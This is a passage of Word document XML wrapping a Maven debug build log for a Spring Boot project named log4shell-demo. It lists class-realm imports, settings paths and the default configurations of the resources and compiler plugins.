    <w:p w14:paraId="4A8C55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org.apache.maven.plugin &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C0BC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org.apache.maven.profiles &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FFBF6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org.apache.maven.project &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5E769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org.apache.maven.reporting &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F90E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org.apache.maven.repository &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A73C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org.apache.maven.rtinfo &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD641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org.apache.maven.settings &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559F72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org.apache.maven.toolchain &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FE7C5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org.apache.maven.usability &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF4B8E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Imported: org.apache.maven.wagon.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506618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org.apache.maven.wagon.authentication &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BC96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org.apache.maven.wagon.authorization &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F8E53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org.apache.maven.wagon.events &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7E34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org.apache.maven.wagon.observers &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A315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org.apache.maven.wagon.proxy &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568299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org.apache.maven.wagon.repository &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B583F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org.apache.maven.wagon.resource &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33920E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org.codehaus.classworlds &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053B755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 &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551079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org.codehaus.plexus.classworlds &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7424EF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org.codehaus.plexus.component &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480E507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org.codehaus.plexus.configuration &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6832F7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org.codehaus.plexus.container &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0648CC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org.codehaus.plexus.context &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CDE4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org.codehaus.plexus.lifecycle &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BBD41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org.codehaus.plexus.logging &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC404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org.codehaus.plexus.personality &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE862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org.codehaus.plexus.util.xml.Xpp3Dom &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1FD4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org.codehaus.plexus.util.xml.pull.XmlPullParser &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4232CF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org.codehaus.plexus.util.xml.pull.XmlPullParserException &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324A84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org.codehaus.plexus.util.xml.pull.XmlSerializer &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBA6D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 &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E19E0D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org.eclipse.aether.artifact &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D2996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org.eclipse.aether.collection &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2753D8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org.eclipse.aether.deployment &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569F45D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org.eclipse.aether.graph &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37481B5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org.eclipse.aether.impl &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644D62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org.eclipse.aether.installation &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D6DA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Imported: org.eclipse.aether.internal.impl &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58868A7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org.eclipse.aether.metadata &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7C10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org.eclipse.aether.repository &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9169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org.eclipse.aether.resolution &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9851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org.eclipse.aether.spi &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8AF1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org.eclipse.aether.transfer &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2659A2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org.eclipse.aether.version &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B8E0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org.fusesource.jansi.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A95E57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org.slf4j.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139075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org.slf4j.event.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E81C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org.slf4j.helpers.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA9192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org.slf4j.spi.* &lt; plexus.core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08364A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Populating class realm maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D120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Error stacktraces are turned on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D7674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Message scheme: color</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA1AD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Message styles: debug info warning error success failure strong mojo project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618786B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Reading global settings from /usr/share/maven/conf/settings.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274708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Reading user settings from /home/ec2-user/.m2/settings.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1BD6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Reading global toolchains from /usr/share/maven/conf/toolchains.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2603CB7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Reading user toolchains from /home/ec2-user/.m2/toolchains.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA0D2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local repository at /home/ec2-user/.m2/repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CA45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manager EnhancedLocalRepositoryManager with priority 10.0 for /home/ec2-user/.m2/repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E9095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3F17EE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Extension realms for project com.example:log4shell-demo:jar:0.0.1-SNAPSHOT: (none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141AF3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Looking up lifecycle mappings for packaging jar from ClassRealm[plexus.core, parent: null]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FF135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Extension realms for project org.springframework.boot:spring-boot-starter-parent:pom:2.5.5: (none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C95A8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Looking up lifecycle mappings for packaging pom from ClassRealm[plexus.core, parent: null]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346584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Extension realms for project org.springframework.boot:spring-boot-dependencies:pom:2.5.5: (none)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35880C3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Looking up lifecycle mappings for packaging pom from ClassRealm[plexus.core, parent: null]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4A63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Resolving plugin prefix spring-boot from [org.apache.maven.plugins, org.codehaus.mojo]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D2D38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Resolved plugin prefix spring-boot to org.springframework.boot:spring-boot-maven-plugin from POM com.example:log4shell-demo:jar:0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A08EB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REACTOR BUILD PLAN ================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733426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Project: com.example:log4shell-demo:jar:0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C6F1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Tasks:   [spring-boot:run]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1537F2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Style:   Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E57A5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2376FE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271993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 com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2F1E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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A2AA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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7077CA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Resolving plugin prefix spring-boot from [org.apache.maven.plugins, org.codehaus.mojo]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8D968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Resolved plugin prefix spring-boot to org.springframework.boot:spring-boot-maven-plugin from POM com.example:log4shell-demo:jar:0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D39C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default -&gt; [validate, initialize, generate-sources, process-sources, generate-resources, process-resources, compile, process-classes, generate-test-sources, process-test-sources, generate-test-resources, process-test-resources, test-compile, process-test-classes, test, prepare-package, package, pre-integration-test, integration-test, post-integration-test, verify, install, deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4922A3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clean -&gt; [pre-clean, clean, post-clean]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DDDE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site -&gt; [pre-site, site, post-site, site-deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9BEE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default -&gt; [validate, initialize, generate-sources, process-sources, generate-resources, process-resources, compile, process-classes, generate-test-sources, process-test-sources, generate-test-resources, process-test-resources, test-compile, process-test-classes, test, prepare-package, package, pre-integration-test, integration-test, post-integration-test, verify, install, deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B29533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clean -&gt; [pre-clean, clean, post-clean]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6A0E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site -&gt; [pre-site, site, post-site, site-deploy]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA9842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PROJECT BUILD PLAN ================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383FA3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Project:       com.example:log4shell-demo:0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5D719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Dependencies (collect): []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DAD2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Dependencies (resolve): [test]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D681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Repositories (dependencies): [central (https://repo.maven.apache.org/maven2, default, releases)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1036DD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Repositories (plugins)     : [central (https://repo.maven.apache.org/maven2, default, releases)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DA127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init fork of com.example:log4shell-demo:0.0.1-SNAPSHOT for org.springframework.boot:spring-boot-maven-plugin:2.5.5:run (default-cli) ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000428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Dependencies (collect): []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A913C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Dependencies (resolve): [compile, test]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B836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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66166E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Goal:          org.apache.maven.plugins:maven-resources-plugin:3.2.0:resources (default-resources)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059FD46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Style:         Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA48E8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Configuration: &lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FC5E0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5AAF36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&lt;addDefaultExcludes default-value="true"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC92E8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&lt;buildFilters default-value="${project.build.filters}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5709B1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&lt;delimiters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FD96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&lt;delimiter&gt;@&lt;/delimiter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0087FA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&lt;/delimiters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9739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&lt;encoding default-value="${project.build.sourceEncoding}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7392E4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&lt;escapeWindowsPaths default-value="true"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6561FB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&lt;fileNameFiltering default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFB216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&lt;includeEmptyDirs default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3DC24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&lt;outputDirectory default-value="${project.build.outputDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F526DC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&lt;overwrite default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2849C1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&lt;project default-value="${project}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30907E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&lt;propertiesEncoding&gt;UTF-8&lt;/propertiesEncoding&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32482C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&lt;resources default-value="${project.resources}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E6B1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&lt;session default-value="${session}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E214A2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 default-value="false"&gt;${maven.resources.skip}&lt;/skip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E25BAD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&lt;supportMultiLineFiltering default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387E99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&lt;useBuildFilters default-value="true"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC785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&lt;useDefaultDelimiters default-value="true"&gt;false&lt;/useDefaultDelimiters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6051C40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3BD9E72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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3184CB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Goal:          org.apache.maven.plugins:maven-compiler-plugin:3.8.1:compile (default-compile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E88B0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Style:         Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEC04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Configuration: &lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3581D6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510795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&lt;basedir default-value="${basedir}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0AB2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&lt;buildDirectory default-value="${project.build.directory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545CF7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&lt;compilePath default-value="${project.compileClasspathElements}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA05E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&lt;compileSourceRoots default-value="${project.compileSourceRoots}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C57E8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&lt;compilerId default-value="javac"&gt;${maven.compiler.compilerId}&lt;/compilerId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338795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&lt;compilerReuseStrategy default-value="${reuseCreated}"&gt;${maven.compiler.compilerReuseStrategy}&lt;/compilerReuseStrategy&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738844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&lt;compilerVersion&gt;${maven.compiler.compilerVersion}&lt;/compilerVersion&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBEC8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&lt;debug default-value="true"&gt;${maven.compiler.debug}&lt;/debug&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1C17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&lt;debuglevel&gt;${maven.compiler.debuglevel}&lt;/debuglevel&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB5C72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&lt;encoding default-value="${project.build.sourceEncoding}"&gt;${encoding}&lt;/encoding&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA6CE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&lt;executable&gt;${maven.compiler.executable}&lt;/executable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3952DD9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&lt;failOnError default-value="true"&gt;${maven.compiler.failOnError}&lt;/failOnError&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0CE76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&lt;failOnWarning default-value="false"&gt;${maven.compiler.failOnWarning}&lt;/failOnWarning&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7915BD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&lt;forceJavacCompilerUse default-value="false"&gt;${maven.compiler.forceJavacCompilerUse}&lt;/forceJavacCompilerUse&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5221E5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&lt;fork default-value="false"&gt;${maven.compiler.fork}&lt;/fork&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7980C3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&lt;generatedSourcesDirectory default-value="${project.build.directory}/generated-sources/annotations"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDC90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&lt;maxmem&gt;${maven.compiler.maxmem}&lt;/maxmem&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37971F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&lt;meminitial&gt;${maven.compiler.meminitial}&lt;/meminitial&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA03E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&lt;mojoExecution default-value="${mojoExecution}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7A512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&lt;optimize default-value="false"&gt;${maven.compiler.optimize}&lt;/optimize&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2888B8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&lt;outputDirectory default-value="${project.build.outputDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201C386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&lt;parameters default-value="false"&gt;true&lt;/parameters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75ACE96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&lt;project default-value="${project}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0583561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&lt;projectArtifact default-value="${project.artifact}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8B387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&lt;release&gt;${maven.compiler.release}&lt;/release&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0285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&lt;session default-value="${session}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB615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&lt;showDeprecation default-value="false"&gt;${maven.compiler.showDeprecation}&lt;/showDeprecation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6FB6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&lt;showWarnings default-value="false"&gt;${maven.compiler.showWarnings}&lt;/showWarnings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AE13F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&lt;skipMain&gt;${maven.main.skip}&lt;/skipMain&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4045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&lt;skipMultiThreadWarning default-value="false"&gt;${maven.compiler.skipMultiThreadWarning}&lt;/skipMultiThreadWarning&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B3E22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&lt;source default-value="1.6"&gt;${maven.compiler.source}&lt;/source&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F8BD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&lt;staleMillis default-value="0"&gt;${lastModGranularityMs}&lt;/staleMillis&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06797A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&lt;target default-value="1.6"&gt;${maven.compiler.target}&lt;/target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D57DE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&lt;useIncrementalCompilation default-value="true"&gt;${maven.compiler.useIncrementalCompilation}&lt;/useIncrementalCompilation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F07A3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&lt;verbose default-value="false"&gt;${maven.compiler.verbose}&lt;/verbose&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532914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6A02F0B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDAAF3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Goal:          org.apache.maven.plugins:maven-resources-plugin:3.2.0:testResources (default-testResources)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1980DD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Style:         Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBA54A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Configuration: &lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4EE9F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30721A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&lt;addDefaultExcludes default-value="true"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247220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&lt;buildFilters default-value="${project.build.filters}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494ABB4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&lt;delimiters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FEFF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&lt;delimiter&gt;@&lt;/delimiter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B89F1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&lt;/delimiters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160B4C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&lt;encoding default-value="${project.build.sourceEncoding}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A70921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&lt;escapeWindowsPaths default-value="true"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA2601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&lt;fileNameFiltering default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4E22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&lt;includeEmptyDirs default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739C22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&lt;outputDirectory default-value="${project.build.testOutputDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D4DA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&lt;overwrite default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC943E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&lt;project default-value="${project}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033EB7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&lt;propertiesEncoding&gt;UTF-8&lt;/propertiesEncoding&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182201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&lt;resources default-value="${project.testResources}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA3F48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&lt;session default-value="${session}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE95E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 default-value="false"&gt;${maven.test.skip}&lt;/skip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DD09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&lt;supportMultiLineFiltering default-value="false"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D4DC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&lt;useBuildFilters default-value="true"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3514EC1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&lt;useDefaultDelimiters default-value="true"&gt;false&lt;/useDefaultDelimiters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB2E2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2FA69F1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2632D1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Goal:          org.apache.maven.plugins:maven-compiler-plugin:3.8.1:testCompile (default-testCompile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A3F31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Style:         Regular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB231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Configuration: &lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0119E5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5997CE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&lt;basedir default-value="${basedir}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD737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&lt;buildDirectory default-value="${project.build.directory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E75C0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&lt;compilePath default-value="${project.compileClasspathElements}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366933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&lt;compileSourceRoots default-value="${project.testCompileSourceRoots}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDA176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&lt;compilerId default-value="javac"&gt;${maven.compiler.compilerId}&lt;/compilerId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BFC1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&lt;compilerReuseStrategy default-value="${reuseCreated}"&gt;${maven.compiler.compilerReuseStrategy}&lt;/compilerReuseStrategy&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3861B1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&lt;compilerVersion&gt;${maven.compiler.compilerVersion}&lt;/compilerVersion&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E884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&lt;debug default-value="true"&gt;${maven.compiler.debug}&lt;/debug&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71206A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&lt;debuglevel&gt;${maven.compiler.debuglevel}&lt;/debuglevel&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039B07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&lt;encoding default-value="${project.build.sourceEncoding}"&gt;${encoding}&lt;/encoding&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6E54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&lt;executable&gt;${maven.compiler.executable}&lt;/executable&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB39E8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&lt;failOnError default-value="true"&gt;${maven.compiler.failOnError}&lt;/failOnError&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D5A30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&lt;failOnWarning default-value="false"&gt;${maven.compiler.failOnWarning}&lt;/failOnWarning&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDCBC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&lt;forceJavacCompilerUse default-value="false"&gt;${maven.compiler.forceJavacCompilerUse}&lt;/forceJavacCompilerUse&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3697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&lt;fork default-value="false"&gt;${maven.compiler.fork}&lt;/fork&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F671EB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&lt;generatedTestSourcesDirectory default-value="${project.build.directory}/generated-test-sources/test-annotations"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32117C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&lt;maxmem&gt;${maven.compiler.maxmem}&lt;/maxmem&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F4C6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&lt;meminitial&gt;${maven.compiler.meminitial}&lt;/meminitial&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4062DA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&lt;mojoExecution default-value="${mojoExecution}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B77789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&lt;optimize default-value="false"&gt;${maven.compiler.optimize}&lt;/optimize&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215B30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&lt;outputDirectory default-value="${project.build.testOutputDirectory}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425C7B3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&lt;parameters default-value="false"&gt;true&lt;/parameters&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EFD5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&lt;project default-value="${project}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE73E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&lt;release&gt;${maven.compiler.release}&lt;/release&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314B02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&lt;session default-value="${session}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259B65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&lt;showDeprecation default-value="false"&gt;${maven.compiler.showDeprecation}&lt;/showDeprecation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A1F2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&lt;showWarnings default-value="false"&gt;${maven.compiler.showWarnings}&lt;/showWarnings&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DF900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&lt;skip&gt;${maven.test.skip}&lt;/skip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA448D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&lt;skipMultiThreadWarning default-value="false"&gt;${maven.compiler.skipMultiThreadWarning}&lt;/skipMultiThreadWarning&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488BF9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&lt;source default-value="1.6"&gt;${maven.compiler.source}&lt;/source&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE560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&lt;staleMillis default-value="0"&gt;${lastModGranularityMs}&lt;/staleMillis&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B0B8B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&lt;target default-value="1.6"&gt;${maven.compiler.target}&lt;/target&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AC42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&lt;testPath default-value="${project.testClasspathElements}"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F92C8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&lt;testRelease&gt;${maven.compiler.testRelease}&lt;/testRelease&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1B8E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&lt;testSource&gt;${maven.compiler.testSource}&lt;/testSource&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452A9B3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&lt;testTarget&gt;${maven.compiler.testTarget}&lt;/testTarget&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E911CF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&lt;useIncrementalCompilation default-value="true"&gt;${maven.compiler.useIncrementalCompilation}&lt;/useIncrementalCompilation&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701017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&lt;verbose default-value="false"&gt;${maven.compiler.verbose}&lt;/verbose&gt;</w:t>
      </w:r>
    </w:p>
